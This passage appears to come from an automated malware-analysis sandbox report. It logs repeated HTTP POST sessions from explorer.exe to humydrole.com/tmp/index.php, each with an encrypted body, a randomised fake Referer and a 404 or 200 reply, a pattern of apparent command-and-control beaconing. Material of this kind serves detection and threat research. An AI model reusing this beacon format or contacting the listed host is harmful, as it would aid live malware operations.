                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                15192.168.2.649749186.182.55.44804004C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:40.630462885 CET338OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Referer: http://vlmdqkeuvramm.com/
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                Content-Length: 365
                                                                                                                                                                                                                                                                                                                Host: humydrole.com
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:40.630532026 CET419OUTData Raw: 3b 6e 51 10 f7 c8 6e 24 ae ab c1 07 00 75 7f b9 7b 0c ba e1 6c 73 92 61 7c 7a 0e 93 37 c3 c3 6e ed 56 c4 5c 02 1a 2b 6d 9b 9b 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0d 6b 2c 90 f5 76 0b 75 39 40 fd 9f
                                                                                                                                                                                                                                                                                                                Data Ascii: ;nQn$u{lsa|z7nV\+m?!0jHYcM@NA -[k,vu9@_VUzF3e3IGffDE8CR:_cA+)I1(?OTIjV\RrO.)zYpr)haY2
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:41.872435093 CET292INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:07:41 GMT
                                                                                                                                                                                                                                                                                                                Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15
                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.15
                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                16192.168.2.649750186.182.55.44804004C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:42.172760963 CET340OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Referer: http://pjodarlytknlhrm.org/
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                Content-Length: 120
                                                                                                                                                                                                                                                                                                                Host: humydrole.com
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:42.172856092 CET174OUTData Raw: 3b 6e 51 10 f7 c8 6e 24 ae ab c1 07 00 75 7f b9 7b 0c ba e1 6c 73 92 61 7c 7a 0e 93 37 c3 c3 6e ed 56 c4 5c 02 1a 2b 6d 9b 9b 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 02 6b 2c 90 f5 76 0b 75 56 26 e8 f4
                                                                                                                                                                                                                                                                                                                Data Ascii: ;nQn$u{lsa|z7nV\+m?!0jHYcM@NA -[k,vuV&G|Vhsq]%*4N80
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:43.102771997 CET641INHTTP/1.0 404 Not Found
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:07:42 GMT
                                                                                                                                                                                                                                                                                                                Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15
                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.15
                                                                                                                                                                                                                                                                                                                Content-Length: 340
                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                17192.168.2.649752186.182.55.44804004C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:43.432393074 CET338OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Referer: http://ajrsdhfsgvjbu.net/
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                Content-Length: 136
                                                                                                                                                                                                                                                                                                                Host: humydrole.com
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:43.432425976 CET190OUTData Raw: 3b 6e 51 10 f7 c8 6e 24 ae ab c1 07 00 75 7f b9 7b 0c ba e1 6c 73 92 61 7c 7a 0e 93 37 c3 c3 6e ed 56 c4 5c 02 1a 2b 6d 9b 9b 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 00 6b 2c 90 f5 76 0b 75 48 1c c9 95
                                                                                                                                                                                                                                                                                                                Data Ascii: ;nQn$u{lsa|z7nV\+m?!0jHYcM@NA -[k,vuHFiuM5[c1eVdt8|Gy
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:44.357743979 CET641INHTTP/1.0 404 Not Found
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:07:44 GMT
                                                                                                                                                                                                                                                                                                                Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15
                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.15
                                                                                                                                                                                                                                                                                                                Content-Length: 340
                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                18192.168.2.649753186.182.55.44804004C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:44.635087013 CET338OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Referer: http://xfvhvanuqwruj.net/
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                Content-Length: 274
                                                                                                                                                                                                                                                                                                                Host: humydrole.com
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:44.635142088 CET328OUTData Raw: 3b 6e 51 10 f7 c8 6e 24 ae ab c1 07 00 75 7f b9 7b 0c ba e1 6c 73 92 61 7c 7a 0e 93 37 c3 c3 6e ed 56 c4 5c 02 1a 2b 6d 9b 9b 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 01 6b 2c 90 f5 76 0b 75 53 34 c9 ac
                                                                                                                                                                                                                                                                                                                Data Ascii: ;nQn$u{lsa|z7nV\+m?!0jHYcM@NA -[k,vuS4,_p2!wbT]P`]8F]>]'iW!9NZ36y:v8q.tT[1dsSUZ"+
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:45.561587095 CET641INHTTP/1.0 404 Not Found
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:07:45 GMT
                                                                                                                                                                                                                                                                                                                Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15
                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.15
                                                                                                                                                                                                                                                                                                                Content-Length: 340
                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                19192.168.2.649754186.182.55.44804004C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:45.864173889 CET341OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Referer: http://qetqebqqmxjeqsrj.org/
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                Content-Length: 275
                                                                                                                                                                                                                                                                                                                Host: humydrole.com
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:45.864274025 CET329OUTData Raw: 3b 6e 51 10 f7 c8 6e 24 ae ab c1 07 00 75 7f b9 7b 0c ba e1 6c 73 92 61 7c 7a 0e 93 37 c3 c3 6e ed 56 c4 5c 02 1a 2b 6d 9b 9b 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 06 6b 2c 90 f5 76 0b 75 35 07 b3 9a
                                                                                                                                                                                                                                                                                                                Data Ascii: ;nQn$u{lsa|z7nV\+m?!0jHYcM@NA -[k,vu5VT}]0KH>$><WX5\Rw;s=PP7c@ ^)7I.NG[1i^"z&:7)egQ!7MUv8F%}
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:47.113061905 CET641INHTTP/1.0 404 Not Found
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:07:46 GMT
                                                                                                                                                                                                                                                                                                                Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15
                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.15
                                                                                                                                                                                                                                                                                                                Content-Length: 340
                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                20192.168.2.649755186.182.55.44804004C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:50.328068972 CET336OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Referer: http://cdhkkixciru.org/
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                Content-Length: 328
                                                                                                                                                                                                                                                                                                                Host: humydrole.com
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:50.328236103 CET382OUTData Raw: 3b 6e 51 10 f7 c8 6e 24 ae ab c1 07 00 75 7f b9 7b 0c ba e1 6c 73 92 61 7c 7a 0e 93 37 c3 c3 6e ed 56 c4 5c 02 1a 2b 6d 9b 9b 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 07 6b 2c 90 f5 76 0b 75 62 59 db f4
                                                                                                                                                                                                                                                                                                                Data Ascii: ;nQn$u{lsa|z7nV\+m?!0jHYcM@NA -[k,vubYd.cPtw;bXM>f~:@VxP^AA%^'YRK2+bz~:SfRls!;%Gs"X3+]%Q{
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:51.577183962 CET641INHTTP/1.0 404 Not Found
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:07:50 GMT
                                                                                                                                                                                                                                                                                                                Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15
                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.15
                                                                                                                                                                                                                                                                                                                Content-Length: 340
                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                21192.168.2.649756186.182.55.44804004C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:51.855417967 CET338OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Referer: http://ggktrccvsxqfs.net/
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                Content-Length: 199
                                                                                                                                                                                                                                                                                                                Host: humydrole.com
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:51.855755091 CET253OUTData Raw: 3b 6e 51 10 f7 c8 6e 24 ae ab c1 07 00 75 7f b9 7b 0c ba e1 6c 73 92 61 7c 7a 0e 93 37 c3 c3 6e ed 56 c4 5c 02 1a 2b 6d 9b 9b 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 04 6b 2c 90 f5 76 0b 75 62 50 c1 a7
                                                                                                                                                                                                                                                                                                                Data Ascii: ;nQn$u{lsa|z7nV\+m?!0jHYcM@NA -[k,vubPWx[L|OttbOptl8[6>5_\?]F;{hJ9C]2dob5
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:52.776684046 CET641INHTTP/1.0 404 Not Found
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:07:52 GMT
                                                                                                                                                                                                                                                                                                                Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15
                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.15
                                                                                                                                                                                                                                                                                                                Content-Length: 340
                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
